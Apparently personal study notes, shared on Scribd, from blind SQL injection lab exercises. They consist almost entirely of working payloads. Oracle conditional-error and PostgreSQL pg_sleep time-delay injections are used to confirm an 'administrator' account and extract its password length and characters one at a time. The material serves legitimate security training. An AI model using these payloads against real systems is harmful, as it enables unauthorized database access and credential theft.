Scribd
Upload
2 views

Blind SQL Inj

The document outlines a series of SQL injection techniques used to probe a database for information, specifically targeting the existence of a user named 'administrator' and the length of their password. It demonstrates the use of various SQL queries to determine the database type (Oracle or PostgreSQL) and to extract data without causing errors. The document provides a step-by-step approach to retrieving sensitive information through blind SQL injection methods.

Uploaded by

maftunaabdurashidova9
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2 views

Blind SQL Inj

The document outlines a series of SQL injection techniques used to probe a database for information, specifically targeting the existence of a user named 'administrator' and the length of their password. It demonstrates the use of various SQL queries to determine the database type (Oracle or PostgreSQL) and to extract data without causing errors. The document provides a step-by-step approach to retrieving sensitive information through blind SQL injection methods.

Uploaded by

maftunaabdurashidova9
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'

SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'''


did not return any error
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' ||
SELECT '' || '' this also should not have returned any error
but it did so it can indicate server is not mysql, maybe it is oracle

' || (SELECT '' from dual) || ' -> this returned 200, it means we are dealing with
oracle db

2) Prove users table exists

' || (SELECT '' from users)|| ' -> this returned 500, because '' may be repeating
several times, so we need to limit the output to one

' || (SELECT '' from users where rownum=1) || ' -> 200 OK

3) Prove administrator exists in users:


' || (SELECT username from users where username='administrator')='administrator' ||
'

' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where
username='administrator') || ' this returns 200 OK

4) We proved admin exists, now lets check the length of the password.
' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where
username='administrator' and LENGTH(password)>1) || ' ->500
' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where
username='administrator' and LENGTH(password)>50) || ' -> 200 OK

put in the intruder to find out the number of letters

5)is the first letter a?


' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where
username='administrator' and SUBSTR(password, 1, 1)='a') || '
' || (SELECT CASE when(1=1) then TO_CHAR(1/0) ELSE '' END FROM users where
username='administrator' and SUBSTR(password, 2, 1)='a') || '

fahhy0hikq073tya774b

TrackingId=ogAZZfxtOKUELbuJ' AND CAST((SELECT 1) AS int)--


TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT 1) AS int)--
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' --
' AND 1=CAST((SELECT username from users limit 1) AS int) --

'||pg_sleep(10)--

Lab: Blind SQL injection with time delays and information retrieval
'||pg_sleep(10) -- check which database tab we are dealing with -> postgresql
'|| CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END -- worked-> then 1=1,
lets try some query to check if it is right
'|| CASE WHEN ((select username from users where
username='administrator')='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END
-- delayed 10 sec-> so the admin user exists
'|| CASE WHEN ((select SUBSTR(password, 1, 1) from users where
username='administrator')='a') THEN pg_sleep(10) ELSE pg_sleep(0) END -- ->
password length is 20

You might also like